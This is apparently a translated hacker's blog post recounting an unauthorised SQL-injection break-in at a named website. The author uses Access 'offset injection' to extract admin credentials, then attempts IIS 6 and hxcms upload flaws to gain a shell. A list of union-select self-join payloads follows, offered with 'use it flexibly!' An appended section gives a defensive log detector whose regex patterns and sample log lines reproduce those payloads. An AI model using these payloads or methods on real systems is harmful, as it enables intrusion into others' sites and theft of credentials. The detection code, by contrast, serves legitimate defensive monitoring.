Author: F4usT
I had some free time over the past two days and got bored with practising manual injection. Appending a quote character to a URL parameter returned an error, so there was an injection point. I then determined that the database type was Access and that the query had fourteen fields.
http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%20…%20from%20users
I then tried guessing the user name and password column names the usual way, but none of the guesses worked, and cracking the password directly did not work either. Searching Baidu turned up offset injection; I tried it but failed, so I asked the group for help. Thanks to everyone who spent time on it!
It was still offset injection: when someone sent me their statement, I realised that my own injection statement had been wrong, or rather that I had been careless. With the corrected statement the user name and password came out successfully.
http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20o
I found the back-end login, but the admin functions turned out to be very limited.
The editor did reveal that this is the free version of hxcms 7.5, whose upload keeps the original file name and supports remote upload, and the server is IIS 6. I tried the IIS 6 parsing vulnerability, but uploaded images get renamed; I then tested the remote-upload 0day, but the file still ends up renamed with the suffix taken from the file name. Depressing! Getting a shell was really difficult. I wanted to download the 7.5 source code to look at it, but could not find the free 7.5 source anywhere online, so I had to give up.
The main thing I learned was the injection statement itself, so here is a brief summary of offset injection.
The general form of the statements is as follows:
and 1=2 union select * from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id)
and 1=2 union select * from (users as a inner join users as b on a.id=b.id)
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
And so on.
PS: use it flexibly!
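From the defending side, the statements above have a recognisable shape in web server logs: a boolean `and 1=2 union select`, a self-join padded with literal columns before `*`, and aliases joined on `a.id=b.id`. The following detector is an added example, not code from the original post; the IIS-style log lines it scans are constructed here, and the field layout (date, time, method, path, query, status) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post). The query strings
# mirror the offset-injection shapes summarised on this page; the column layout
# "date time method path query status" is assumed for this example.
SAMPLE_LOG = """\
2023-01-01 10:00:01 GET /show_new.asp bh=397 200
2023-01-01 10:00:02 GET /show_new.asp bh=397' 500
2023-01-01 10:00:03 GET /show_new.asp bh=397%20and%201=2%20union%20select%201,2,3,*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20on%20a.id=b.id) 200
2023-01-01 10:00:04 GET /show_new.asp bh=394%20and%201=2%20union%20select%20*%20from%20((select%20*%20from%20admin)%20as%20a%20inner%20join%20(select%20*%20from%20admin)%20as%20b%20on%20a.id=b.id) 200
2023-01-01 10:00:05 GET /index.asp page=2 200
"""

# Each indicator is a regex over the decoded, whitespace-normalised, lower-cased query.
INDICATORS = {
    "boolean_union": re.compile(r"\band\s+1\s*=\s*2\s+union\s+select\b"),
    "self_join_pad": re.compile(r"\binner\s+join\b.*\bas\s+\w+\s+on\s+\w+\.id\s*=\s*\w+\.id"),
    "wildcard_in_union": re.compile(r"\bunion\s+select\b[^()]*\*"),
}

def normalise_query(raw):
    """Percent-decode repeatedly (defeats double encoding), collapse whitespace, lower-case."""
    decoded = raw
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"\s+", " ", decoded).strip().lower()

def padding_columns(query):
    """Count the literal columns placed before '*' in 'union select 1,2,3,* ...'."""
    m = re.search(r"union select ((?:\d+\s*,\s*)+)\*", query)
    return m.group(1).count(",") if m else 0

def analyse_line(line):
    """Return (path, matched indicator names, padding count) for one log line."""
    parts = line.split()
    if len(parts) < 5:
        return None
    path, query = parts[3], normalise_query(parts[4])
    hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
    return path, hits, padding_columns(query)

def scan(log_text):
    """Return the analysed lines that matched at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        res = analyse_line(line)
        if res and res[1]:
            findings.append(res)
    return findings
```

The padding count tracks the attacker's column probing step by step, which is a useful field to alert on alongside the raw indicator names.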